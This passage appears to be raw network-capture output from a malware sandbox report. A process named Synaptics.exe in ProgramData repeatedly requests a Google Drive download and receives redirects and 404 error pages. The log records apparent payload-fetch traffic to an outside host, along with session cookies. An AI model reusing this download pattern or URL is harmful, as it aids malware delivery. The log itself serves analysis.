                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      42192.168.2.649894142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:50 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:50 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zjqRDiL6YWHT3wgYjx44fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      43192.168.2.649902142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                                                                                                                      2024-12-30 10:40:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-rXObeHOu0g0zEqHioJyb_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      44192.168.2.649904142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:51 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4lrNtNmMrZFu1nW6CgRsnm3e08VyybeC672SKzCK1KSl_xQof1OvMDAN9c45jbzoSK
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-GhGD48duzjwWq0iHhpvSjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:51 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:51 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 30 5f 78 62 72 49 30 41 4e 64 51 77 37 36 51 47 6b 50 47 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="90_xbrI0ANdQw76QGkPGvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:51 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.649903142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                                                                                                                      2024-12-30 10:40:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-tyd0yqc0-V6-4Yt1jDrJSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.649905142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4d92cJFdJiVNa9eFSZfKv7P6lnDXO2BYw7OmGT1S3ie9_IqHopdM1CkgH66KCyI10n-8hNfJ0
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZC-wFo_hQk4T4hNQ4pBcVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 77 59 7a 77 33 79 6c 74 5f 6f 66 52 6d 70 4e 70 79 79 78 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="8wYzw3ylt_ofRmpNpyyxGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.649915142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:53 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC78_eg5XewAkuh3xck0WBShnNvQxtkSfqlnfZl19gkkD4nqOC-5vGn5r_DuaHeIja9YWIlK9wQ
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:52 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zSvyTcHj0D2JUch8206yEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:53 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 41 39 58 65 70 35 41 6c 51 38 5f 38 34 4f 4e 33 37 6f 33 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="FA9Xep5AlQ8_84ON37o3nA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      48192.168.2.649916142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:52 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-hZLAouUMrCw_0rmbClwgLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      49192.168.2.649917142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
